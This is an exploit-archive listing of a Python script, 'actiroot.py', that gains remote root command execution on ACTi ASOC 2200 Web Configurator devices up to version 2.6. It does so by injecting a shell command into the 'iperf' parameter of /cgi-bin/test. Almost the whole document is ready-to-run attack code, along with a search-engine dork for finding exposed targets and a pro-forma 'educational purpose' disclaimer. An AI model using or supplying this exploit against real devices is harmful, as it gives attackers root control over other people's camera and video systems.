Lucene search

K
packetstormBaltazarPACKETSTORM:99472
HistoryMar 18, 2011 - 12:00 a.m.

ACTi ASOC 2200 Web Configurator 2.6 Remote Root Command Execution

2011-03-1800:00:00
baltazar
packetstormsecurity.com
45
`#!/usr/bin/python  
# This was written for educational purpose and pentest only. Use it at your own risk.  
# Author will be not responsible for any damage!  
# !!! Special greetz for my friend sinner_01 !!!  
# Toolname : actiroot.py  
# Coder : baltazar a.k.a b4ltazar < [email protected]>  
# Version :   
# About : ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution  
# Greetz for rsauron and low1z, great python coders  
# greetz for d3hydr8, qk, marezzi, StRoNiX, t0r3x, fx0, TraXdata, v0da and all members of ex darkc0de.com, ljuska.org and rev3rse.org  
#   
#   
# Example of use : ./actiroot.py target cmd  
# Based on http://packetstormsecurity.org/files/view/99414/actiasoc-exec.txt, so all credits go to original author ...  
  
import sys, os, time, urllib2, re  
  
if sys.platform == 'linux' or sys.platform == 'linux2':  
clearing = ' clear'  
else:  
clearing = 'cls'  
os.system(clearing)  
  
R = "\033[31m";  
G = "\033[32m";  
  
def logo():  
print G+"\n|---------------------------------------------------------------|"  
print "| |"  
print "| b4ltazar[@]gmail[dot]com |"  
print "| 03/2011 actiroot.py |"  
print "| ACTi Corporation remote root |"  
print "| |"  
print "|---------------------------------------------------------------|\n"  
print "\n[-] %s\n" % time.strftime("%X")  
  
if len(sys.argv) != 3:  
logo()  
print "Usage: ./actiroot.py TARGET CMD"  
sys.exit(0)  
  
target = sys.argv[1]  
cmd = sys.argv[2]  
logo()  
exploit = "http://"+target+"/cgi-bin/test?iperf=;"+cmd+" &"  
print G+"[+] ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution"  
print "[+] Gd0rk: intitle:Web Configurator - Version v2.6"  
print " inurl:videoconfiguration.cgi"  
print "[+] Target: ",target  
print "[+] Command: ",cmd  
print "[+] Exploit: ", exploit  
print "[!] Trying to exploit ..."  
print "[+] Please wait ..."  
  
try:  
target = "http://"+target  
root = urllib2.urlopen(target+"/cgi-bin/test?iperf=;"+cmd)  
root = root.read()  
if re.findall("execute", root):  
print "[!] w00t,w00t!!! Exploit works ...\n"  
print R+root  
print G+"\n[!] Exiting ..."  
else:  
print "[-] Sorry, exploit failed !"  
print "\n[!] Exiting ..."  
except(KeyboardInterrupt, SystemExit):  
pass  
  
  
  
  
  
  
  
  
  
  
  
  
`